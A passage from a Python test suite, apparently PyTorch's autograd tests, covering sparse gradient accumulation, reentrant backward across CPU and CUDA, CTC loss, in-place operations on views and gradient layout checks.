_test(sparse_size + dense_size, len(sparse_size), nnz, device)
@dtypes(torch.double, torch.cdouble)
def test_sparse_backward(self, device, dtype):
class FixedGradientFunction(Function):
@staticmethod
def forward(ctx, x, grad_x):
ctx.save_for_backward(grad_x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_grad_x, = ctx.saved_tensors
return saved_grad_x, None
size = torch.Size([6, 3, 2])
i1 = torch.tensor([
[0, 3, 4],
[0, 2, 2],
], dtype=torch.long)
v1 = make_tensor([3, 2], dtype=dtype, device=device)
sparse_grad1 = torch.sparse_coo_tensor(i1, v1, size, dtype=dtype, device=device)
i2 = torch.tensor([
[0, 1, 3, 4],
[0, 1, 2, 2],
], dtype=torch.long)
v2 = make_tensor([4, 2], dtype=dtype, device=device)
sparse_grad2 = torch.sparse_coo_tensor(i2, v2, size, dtype=dtype, device=device)
dense_grad = torch.rand(size, device=device, dtype=dtype)
fn = FixedGradientFunction
# sparse first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, dense_grad) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# dense first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, dense_grad) + fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# sparse only
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, sparse_grad1 + sparse_grad2)
# autograd tests via common_method_invocations don't allow input tensors to
# be sparse (RuntimeError: gradcheck expects all tensor inputs are dense when
# check_sparse_nnz is set to False.)
def test_sparse_mask_autograd(self, device):
tensor = torch.randn(3, requires_grad=True, device=device)
mask = torch.ones(3, device=device)
mask[1] = 0
mask = mask.to_sparse()
converted = tensor.sparse_mask(mask).to_dense()
converted.sum().backward()
self.assertEqual(tensor.grad, mask.to_dense())
def test_pyscalar_conversions(self, device):
def _test_pyscalar_conversions(t, integral_conv):
# integral -> integral
l = t(torch.zeros(1, 1, 1, dtype=torch.long))
pyscalar = -12345
l[0] = pyscalar
self.assertEqual(integral_conv(l), pyscalar)
# floating point -> floating point
f = Variable(t(torch.randn(1, 1, dtype=torch.double)))
pyscalar = -12345.1
f[0] = pyscalar
self.assertEqual(float(f), pyscalar)
f[0] = nan
self.assertTrue(math.isnan(float(f)))
f[0] = inf
self.assertEqual(float(f), inf)
f[0] = -inf
self.assertEqual(float(f), -inf)
# integral -> floating point
# check we can convert something that loses precision
pyscalar = 1234567890123456789
self.assertNotEqual(pyscalar, integral_conv(float(pyscalar)))
l[0] = pyscalar
self.assertEqual(float(l), float(pyscalar))
# floating point -> integral
f[0] = nan
self.assertRaises(ValueError, lambda: integral_conv(f[0]))
f[0] = inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = -inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = sys.float_info.max
self.assertEqual(integral_conv(f), sys.float_info.max)
# bool, nonzero
def test_nonzero(tensor, value, expected):
tensor[0] = value
self.assertEqual(expected, bool(tensor))
self.assertEqual(expected, True if tensor else False)
test_nonzero(l, 0, False)
test_nonzero(l, -2, True)
test_nonzero(f, 0.0, False)
test_nonzero(f, sys.float_info.min, True)
test_nonzero(f, nan, bool(nan))
test_nonzero(f, inf, bool(inf))
test_nonzero(f, -inf, bool(-inf))
_test_pyscalar_conversions(lambda x: x.to(device), lambda x: int(x))
@dtypesIfCUDA(torch.half, torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
@dtypes(torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
def test_set_requires_grad_only_for_floats(self, device, dtype):
def f1():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad_()
def f2():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = True
def f3():
torch.ones(1, dtype=dtype, device=device, requires_grad=True)
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = False # should always work
a.requires_grad_(False)
for f in [f1, f2, f3]:
if dtype.is_floating_point:
f()
else:
with self.assertRaisesRegex(RuntimeError, 'floating point', msg="dt: {} device: {}".format(a.dtype, a.device)):
f()
@onlyCUDA
def test_advanced_indexing_backwards_large(self, device):
# See https://github.com/pytorch/pytorch/issues/22843
n = (1 << 16)
x = torch.rand(n, 1, device=device, requires_grad=True)
a = x[:, [0]]
a.sum().backward()
self.assertEqual(x.grad, torch.ones(n, 1, device=device))
def test_advanced_indexing_backwards_memory_format(self, device):
# See https://github.com/pytorch/pytorch/issues/36956
shape = (2, 8, 1, 2)
i = torch.randint(1, shape, device=device).contiguous(memory_format=torch.channels_last)
x = torch.randn(shape, requires_grad=True, device=device)
x[i].sum().backward()
def _test_reentrant_parent_error_on_cpu(self, device):
t1 = torch.rand([3, 3], requires_grad=True)
t2 = torch.rand([3, 3], device=device, requires_grad=True)
t3 = torch.rand([3, 3], device=device, requires_grad=True)
# Parent graph cpu graph.
t4 = t1 * t1
t5 = TestAutograd.SimulateBackwardError.apply(t4)
# Child gpu graph (much longer than parent graph).
prev = t2 * t2
for i in range(10):
prev = prev * t2
reentrant_root = prev
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will take much longer.
reentrant_root.backward()
return grad
# Parent gpu graph.
t6 = ReentrantFunc.apply(t3)
t7 = t6 * t6
# Parent graph will error out first, while child graph will continue executing.
with self.assertRaisesRegex(Exception, "Simulate error"):
torch.autograd.backward([t5.sum(), t7.sum()])
# No grads should be accumulated since child graph will stop execution
# after parent receives error.
self.assertIsNone(t2.grad)
self.assertIsNone(t1.grad)
self.assertIsNone(t3.grad)
@onlyCUDA
def test_reentrant_parent_error_on_cpu(self, device):
before = CudaMemoryLeakCheck.get_cuda_memory_usage()
# Run as separate function so that gc can clean up everything when we
# check for memory usage.
self._test_reentrant_parent_error_on_cpu(device)
# Wait for autograd thread to cleanup failed tasks.
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
start = time.time()
while before != after and time.time() - start < 30:
time.sleep(0.1)
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
self.assertEqual(before, after)
# test for backward in https://github.com/pytorch/pytorch/issues/15511
# TODO: opinfo pdist
def test_pdist_large(self, device):
def func(x):
return torch.pdist(x, p=2)
# shape[0] should be able to be (roughly) arbitrarily large, but the kernel
# is currently limited to smaller sizes (see issue above); this is just testing
# a floor.
shape = (1000, 1)
x = torch.randn(shape, device=device).requires_grad_()
output = torch.pdist(x, p=2)
# just run a single backward, as gradcheck/gradgradcheck is expensive here
output.sum().backward()
# TODO: see if these tests can be ported to OpInfos or moved to where's test suite
def test_where_functional(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where(cond, x, y):
return torch.where(cond, x, y)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, device=device)])
x = torch.randn(5, 1, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, 1, dtype=torch.double, device=device, requires_grad=True)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, 5, device=device)])
def test_where_scalar(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
scalar = 4.
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where_scalar_first(cond, x):
return torch.where(cond, scalar, x)
def where_scalar_second(cond, x):
return torch.where(cond, x, scalar)
gradcheck(where_scalar_first, (cond, x))
gradgradcheck(where_scalar_first, (cond, x))
gradcheck(where_scalar_second, (cond, x))
gradgradcheck(where_scalar_second, (cond, x))
@skipCUDAIf(True, """Test is flaky on Linux and Windows, typical error message:
https://github.com/pytorch/pytorch/issues/34870""")
def test_ctc_loss(self, device):
batch_size = 64
num_labels = 101
target_length = 15
gradcheck_input_size = 10
ZERO_NONE = 0
ZERO_SOME = 1
ZERO_ALL = 2
# input_length, vary_lengths, zero_lengths
tests = [(150, False, ZERO_NONE),
(150, True, ZERO_NONE),
(50, True, ZERO_SOME),
(50, True, ZERO_ALL)]
if 'cuda' in device:
tests += [(50, False, ZERO_NONE),
(50, True, ZERO_NONE),
(150, True, ZERO_SOME),
(150, True, ZERO_ALL)]
for input_length, vary_lengths, zero_mode in tests:
targets = torch.randint(1, num_labels, (batch_size, target_length),
device=device, dtype=torch.long)
x = torch.randn(gradcheck_input_size, dtype=torch.double, device=device, requires_grad=True)
tile_factors = torch.randn(input_length * batch_size * num_labels // gradcheck_input_size + 1,
device=device)
input_lengths = [(torch.randint(input_length // 2, input_length + 1, ()).item()
if vary_lengths or i == 0 else input_length) for i in range(batch_size)]
if zero_mode == ZERO_ALL:
target_lengths = [0 for _ in range(batch_size)]
else:
target_lengths = [(torch.randint(target_length // 2, target_length + 1, ()).item()
if vary_lengths else target_length) for _ in range(batch_size)]
if zero_mode == ZERO_SOME:
idxes = torch.randint(0, batch_size, (10,))
for i in idxes:
target_lengths[i] = 0
def ctc_after_softmax(x):
x_full = ((x[:, None] * tile_factors[None, :]).view(-1)[:input_length * batch_size * num_labels]
.view(input_length, batch_size, num_labels))
log_probs = torch.log_softmax(x_full, 2)
return torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths)
gradcheck(ctc_after_softmax, [x])
@onlyCUDA
@skipCUDAIfRocm
@skipCUDAIfCudnnVersionLessThan(7600)
def test_ctc_loss_cudnn(self, device):
batch_size = 16
input_length = 30
num_labels = 101
target_length = 15
targets = torch.randint(1, num_labels, (batch_size * target_length,),
device='cuda', dtype=torch.long)
log_probs = torch.log_softmax(torch.randn(input_length, batch_size, num_labels, device='cuda', dtype=torch.float), 2)
log_probs.requires_grad_()
input_lengths = batch_size * [input_length]
target_lengths = batch_size * [target_length]
grad_out = torch.randn(batch_size, device='cuda', dtype=torch.float)
with torch.backends.cudnn.flags(enabled=False):
loss_native = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction='none')
grad_native, = torch.autograd.grad(loss_native, log_probs, grad_out)
loss_cudnn = torch.nn.functional.ctc_loss(log_probs, targets.to('cpu', torch.int32),
input_lengths, target_lengths, reduction='none')
self.assertTrue("Cudnn" in str(loss_cudnn.grad_fn))
grad_cudnn, = torch.autograd.grad(loss_cudnn, log_probs, grad_out)
self.assertEqual(grad_cudnn, grad_native, atol=1e-4, rtol=0)
def test_leaky_relu_inplace_with_neg_slope(self, device):
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.leaky_relu_(a.clone(), -2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.rrelu_(a.clone(), -5.0, 1.0)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
def test_leaky_relu_inplace_with_zero_slope(self, device):
a = torch.tensor([-2., 0., 2.], device=device, requires_grad=True)
b = torch.nn.functional.leaky_relu_(a.clone(), 0.0)
b.backward(torch.ones(3, device=device))
expected = torch.tensor([0., 0., 1.], device=device)
self.assertEqual(a.grad, expected)
a_bf16 = torch.tensor([-2., 0., 2.], device=device, dtype=torch.bfloat16, requires_grad=True)
b_bf16 = torch.nn.functional.leaky_relu_(a_bf16.clone(), 0.0)
b_bf16.backward(torch.ones(3, device=device))
expected_bf16 = torch.tensor([0., 0., 1.], device=device, dtype=torch.bfloat16)
self.assertEqual(a_bf16.grad, expected_bf16)
@onlyOnCPUAndCUDA
def test_elu_inplace_with_neg_alpha(self, device):
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.elu_(a.clone(), alpha=-2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.celu_(a.clone(), alpha=-2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
@onlyCUDA
def test_free_unneeded_tensor(self, device):
x = torch.randn(2, 3, 10, 10, device=device, requires_grad=True)
m = torch.randn(1, 3, 1, 1, device=device)
z = x.sum()
base_mem = torch.cuda.memory_allocated()
z = ((x + 2) * m).sum()
end_mem = torch.cuda.memory_allocated()
# In the end the memory usage should remain equal, because neither of
# (x + 2) and ((x + 2) * m) should be kept alive for backward, while the
# previous allocation of z had the same size as the current one.
self.assertEqual(base_mem, end_mem)
@onlyCUDA
def test_pin_memory(self, device):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
self.assertEqual(x, x.pin_memory())
self.assertIsNot(x, x.pin_memory())
self.assertTrue(x.pin_memory().requires_grad)
gradcheck(lambda x: x.pin_memory(), [x])
gradgradcheck(lambda x: x.pin_memory(), [x])
@skipCUDAIfRocm
@onlyCUDA
def test_profiler_emit_nvtx(self, device):
# This test is not intended to ensure correctness of nvtx ranges.
# That would require something a great deal more complex (you'd have to create a
# profile in a subprocess, open it, and parse the sql somehow).
# This test is merely intended to catch if emit_nvtx breaks on construction.
a = torch.tensor([1, 2, 3], dtype=torch.float32, device=device)
with torch.cuda.profiler.profile():
with emit_nvtx():
a.add(1.0)
@onlyCUDA
def test_rnn_backward_to_input_but_not_parameters(self, device):
# this checks whether it is possible to not require
# weight parameters, but require inputs, see #7722
l = torch.nn.LSTM(2, 3).to(device)
for p in l.parameters():
p.requires_grad = False
s = torch.randn(1, 1, 2, requires_grad=True, device=device)
out, _ = l(s)
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
@onlyCUDA
def test_lstmcell_backward_only_one_output_grad(self, device):
# checks that undefined gradients doen't hamper the backward
# see #11872
l = torch.nn.LSTMCell(2, 3).to(device).double()
s = torch.randn(1, 2, device=device, dtype=torch.double, requires_grad=True)
for i in range(2):
out = l(s)[i]
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
def _test_rnn_mod(self, mod, inp):
def flatten_out(mod, inp):
out = mod(inp)
return tuple([t if isinstance(t, torch.Tensor) else tt for t in out for tt in t])
gradcheckfunc = partial(flatten_out, mod)
with torch.backends.cudnn.flags(enabled=False):
gradcheck(gradcheckfunc, inp, check_batched_grad=False)
gradgradcheck(gradcheckfunc, inp, check_batched_grad=False)
if inp.is_cuda and not TEST_WITH_ROCM:
# Assert that we have good error message around unsupported CuDNN double backward
# NB: we trigger double backward using .backward() instead of autograd.grad due to
# https://github.com/pytorch/pytorch/issues/37874
with torch.backends.cudnn.flags(enabled=True):
result = gradcheckfunc(inp)
result[0].sum().backward(create_graph=True)
grad0 = next(mod.parameters()).grad
with self.assertRaisesRegex(RuntimeError,
"please disable the CuDNN backend temporarily"):
grad0.sum().backward()
# Here we avoid the backward(create_graph=True) memory leak
# described in https://github.com/pytorch/pytorch/issues/7343
for param in mod.parameters():
param.grad = None
inp.grad = None
@skipMeta # LSTM cell reuses output which was resized
def test_LSTM_grad_and_gradgrad(self, device):
hsize = 4
inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
for bias in [True, False]:
mod = torch.nn.LSTM(hsize, hsize, bias=bias).to(device).to(torch.float64)
self._test_rnn_mod(mod, inp)
@skipMeta # GRU cell reuses output which was resized
def test_GRU_grad_and_gradgrad(self, device):
hsize = 4
inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
for bias in [True, False]:
mod = torch.nn.GRU(hsize, hsize, bias=bias).to(device).to(torch.float64)
self._test_rnn_mod(mod, inp)
def test_copysign_subgradient(self, device):
# Input is 0.0
x = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Input is -0.0
x = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Other is 0.0
x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [-1.0, 0.0, 1.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Other is -0.0
x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [1.0, 0.0, -1.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
@deviceCountAtLeast(1)
def test_grad_assignment(self, devices):
x = torch.randn(5, 5, device=devices[0])
# Tests that the wrong shape raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(2, 2, device=devices[0])
# Tests that the wrong dtype raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, dtype=torch.long, device=devices[0])
# Tests that self-assignment raises
with self.assertRaises(RuntimeError):
x.grad = x
# Tests device -> cpu grad assignment raises
if self.device_type != 'cpu':
with self.assertRaises(RuntimeError):
t_cpu = torch.rand(5, 5)
t_cpu.grad = torch.randn(5, 5, device=devices[0])
# Tests half type on CUDA
if self.device_type == 'cuda':
x = x.to(dtype=torch.half, device=devices[0])
x.grad = torch.zeros_like(x)
# Tests cross-device assignment raises
if len(devices) > 1:
x = torch.randn(5, 5, device=devices[0])
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, device=devices[1])
@deviceCountAtLeast(1)
@dtypes(torch.float, torch.double)
def test_requires_grad_factory(self, devices, dtype):
fns = [torch.ones_like, torch.randn_like]
x = torch.randn(2, 3, dtype=dtype, device=devices[0])
for fn in fns:
for requires_grad in [True, False]:
output = fn(x, dtype=dtype, device=devices[0], requires_grad=requires_grad)
self.assertEqual(requires_grad, output.requires_grad)
self.assertIs(dtype, output.dtype)
self.assertEqual(devices[0], str(x.device))
@deviceCountAtLeast(2)
def test_unused_output_device(self, devices):
from torch.nn.parallel._functions import Broadcast
x = torch.randn(5, 5, dtype=torch.float, device=devices[0], requires_grad=True)
outputs = Broadcast.apply(list(range(len(devices))), x)
y = outputs[-1] * 2
y.sum().backward()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(x.grad, torch.ones(5, 5) * 2)
@deviceCountAtLeast(2)
def test_backward_device(self, devices):
# check that current device matches the variable's device
device = [None]
class Identity(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.clone()
@staticmethod
def backward(ctx, grad_output):
device[0] = grad_output.device
return grad_output.clone()
v = torch.randn(1, device=devices[1], requires_grad=True)
Identity.apply(v).backward()
self.assertEqual(str(device[0]), devices[1])
@deviceCountAtLeast(2)
def test_inputbuffer_add_multidevice(self, devices):
input = torch.randn(1, device=devices[0], requires_grad=True)
output = input.to(device=devices[1]) + input.to(device=devices[1])
output.backward()
@onlyCPU
def test_copy_(self, device):
# At the time of writing this test, copy_ is not generated from native_functions.yaml
# there was a bug that bfloat16 was not recognized as floating.
x = torch.randn(10, device=device, requires_grad=True)
floating_dt = [dt for dt in get_all_dtypes() if dt.is_floating_point]
for dt in floating_dt:
y = torch.empty(10, device=device, dtype=dt)
y.copy_(x)
self.assertTrue(y.requires_grad)
z = x.to(torch.bfloat16)
self.assertTrue(z.requires_grad)
@onlyCUDA
def test_simple_reentrant_cross_device(self, device):
class ReentrantFunc(Function):
_cpu_mode = True
@staticmethod
def forward(ctx, x):
return x * (x + 2)
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
if ReentrantFunc._cpu_mode:
new_param = torch.randn(2, 2, requires_grad=True)
(new_param ** 2).sum().backward()
else:
new_param = torch.randn(2, 2, device=device, requires_grad=True)
(new_param ** 2).sum().backward()
return grad_output
# Reentrant starts on GPU thread, finishs on GPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on CPU thread, finishs on GPU thread
x = torch.randn(2, 2, requires_grad=True)
# set ReentrantFunc node to GPU to emit tasks to GPU queue
ReentrantFunc._cpu_mode = False
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on GPU thread, finishs on CPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
# set ReentrantFunc node to CPU to emit tasks to CPU queue
ReentrantFunc._cpu_mode = True
out = ReentrantFunc.apply(x)
out.sum().backward()
@onlyCUDA
def test_cross_device_reentrant_autograd(self, device):
# Output on gpu so that this task will be associated with the gpu thread
def fn_on_gpu(inp):
# Artificially increase the priority of the next op to make sure it runs
# as soon as we reach it before the ops of branch1.
dummy = inp * 2 * 2 * 2 * 2
return inp.to(device=device)
def parent_on_cpu(inp):
# Slow branch of ops on gpu so that the work queue for the gpu thread
# won't empty too quickly. They also have smaller priorities than the
# ones created by fn_on_gpu
branch1 = inp.to(device=device)
branch1 = branch1 / branch1
branch1 = branch1 / branch1
branch1 = branch1 / branch1
# Perform checkpoint on cpu tensors. So the last op performed in the reentrant
# autograd is an AccumulateGrad that runs on the cpu thread for the gpu thread.
# So the cpu thread will notify the gpu thread with an empty NodeTask.
branch2 = checkpoint(fn_on_gpu, inp)
out = branch2 + branch1
return out
inp = torch.rand(2, requires_grad=True)
out = parent_on_cpu(inp)
# This will segfault if the empty NodeTask is not handled properly in the
# gpu thread ReadyQueue
out.sum().backward()
def test_inplace_on_view_backprop_base(self, device):
# modify view and back-prop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v1.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [1, 1]])
def test_inplace_on_view_backprop_view_of_view(self, device):
# modify view and backprop through view-of-view
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = x.narrow(0, 0, 1)
v1.mul_(2)
v2.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [0, 0]])
def test_inplace_on_view_of_view(self, device):
# modify view-of-view and backprop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1]])
def test_inplace_on_view_then_no_grad(self, device):
# Perform an in-place operation on a view of a non-leaf variable.
a = torch.ones(3, 1, dtype=torch.double, device=device, requires_grad=True)
b = a * 2
c = b.view_as(b)
c[0][0] = 3
# Force a graph update with grad disabled.
with torch.no_grad():
c.grad_fn
c.sum().backward()
def test_inplace_on_view_gradcheck(self, device):
# gradcheck modifications to views
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
x.narrow(1, 2, 2).narrow(0, 1, 2).mul_(b)
x.narrow(1, 0, 2).narrow(0, 1, 2).mul_(b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_multiple_outputs(self, device):
root = torch.arange(9., dtype=torch.double).reshape(3, 3).requires_grad_()
x = root.clone()
v1 = x.unbind()
with self.assertRaises(RuntimeError):
v1[0].mul_(2)
def test_inplace_on_view_of_multiple_output_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.unbind(0)
c = b[0].view_as(b[0])
with self.assertRaises(RuntimeError):
c.mul_(2)
def test_inplace_multiple_output_view_of_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.view_as(a)
c = b.unbind(0)
with self.assertRaises(RuntimeError):
c[0].mul_(2)
def test_inplace_on_view_makes_base_require_grad(self, device):
# in-place modification to view makes base require grad
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=False)
b = torch.randn(4, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
self.assertFalse(x.requires_grad)
x.narrow(1, 2, 2).mul_(b)
self.assertTrue(x.requires_grad)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_backprop_view(self, device):
# modify view and backprop through view
a = torch.tensor([2., 5.], device=device, requires_grad=False)
b = torch.tensor([3.], device=device, requires_grad=True)
res = a.narrow(0, 1, 1).mul_(b)
res.sum().backward()
self.assertEqual(b.grad.tolist(), [5])
self.assertIsNone(a.grad)
def test_inplace_on_view_modify_base(self, device):
# Test that an in-place operation on a base that forced it to require
# grad also forces any previous views to require grad and backprop
# correctly
r = torch.ones(1, dtype=torch.double, device=device, requires_grad=True)
def fn(r):
x = torch.ones(5, dtype=torch.double, device=device)
v = x.select(0, 1)
self.assertFalse(v.requires_grad)
self.assertIsNone(v.grad_fn)
x.add_(r) # v is now dependent on r due to the in-place op on x
self.assertTrue(v.requires_grad)
return v
gradcheck(fn, [r])
gradgradcheck(fn, [r])
def test_inplace_on_view_python(self, device):
# in-place modifications of Python-autograd created view
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
class PyAdd(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y):
ctx.mark_dirty(x)
x.add_(y)
return x
@staticmethod
def backward(ctx, grad):
return grad, grad
def func(root, b):
x = root.clone()
PyAdd.apply(x.narrow(1, 2, 2).narrow(0, 1, 2), b)
PyAdd.apply(x.narrow(1, 0, 2).narrow(0, 1, 2), b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_non_contig(self, device):
root = torch.ones(2, 3, 2, device=device).select(2, 1).t().requires_grad_(True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1], [1, 1]])
def test_inplace_on_view_multi_output_unsafe(self, device):
for f in [lambda t: t.unsafe_split(1),
lambda t: t.unsafe_split_with_sizes((1, 1, 1)),
lambda t: t.unsafe_chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
s1.mul_(s2)
s1.sum().backward()
def test_inplace_on_view_multi_output_safe(self, device):
for f in [lambda t: t.split(1),
lambda t: t.split_with_sizes((1, 1, 1)),
lambda t: t.chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
error_msg = 'This view is the output of a function that returns multiple views.'
with self.assertRaisesRegex(RuntimeError, error_msg):
s1.mul_(s2)
def test_mv_grad_stride_0(self, device):
# Reference: https://github.com/pytorch/pytorch/issues/38315
mat = torch.randn(2, 2, dtype=torch.double, device=device)
vec = torch.randn(1, dtype=torch.double, device=device).requires_grad_(True)
def fn(vec):
# Expand inside the function to make sure the input to
# gradcheck does not have overlapping memory
vec = vec.expand(2)
return (mat @ vec).sum()
gradcheck(fn, (vec))
gradgradcheck(fn, (vec))
@onlyCUDA
def test_gradcheck_input_output_different_device(self, device):
x = torch.ones((1,), dtype=torch.double, device="cuda", requires_grad=True)
gradcheck(lambda x: x.to("cpu"), (x,))
x = torch.ones((1,), dtype=torch.double, device="cpu", requires_grad=True)
gradcheck(lambda x: x.to("cuda"), (x,))
# TODO: see if this can be OpInfo'd or moved to test_reductions.py
def test_logcumsumexp_large_value(self, device):
a = torch.rand(4, 4, 4, dtype=torch.double, requires_grad=True)
with torch.no_grad():
# Large Number
a[0] = 10000
gradcheck(lambda x: x.logcumsumexp(0), a)
gradgradcheck(lambda x: x.logcumsumexp(0), a)
gradcheck(lambda x: x.logcumsumexp(1), a)
gradgradcheck(lambda x: x.logcumsumexp(1), a)
gradcheck(lambda x: x.logcumsumexp(2), a)
gradgradcheck(lambda x: x.logcumsumexp(2), a)
def test_strided_leaf_grad_layout(self, device):
# (1) If leaf is non-overlapping and dense, grad's layout should match its leaf.
for fmt_a in (torch.contiguous_format, torch.channels_last):
for fmt_b in (torch.contiguous_format, torch.channels_last):
a = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_a)
b = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_b)
a.requires_grad_()
b.requires_grad_()
# checks (1) for broadcasted gradients
a.sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
b.sum().backward()
self.assertEqual(b.grad.stride(), b.stride())
# checks (1) for non-broadcasted gradients
a.grad = None
b.grad = None
(a * b).sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
self.assertEqual(b.grad.stride(), b.stride())
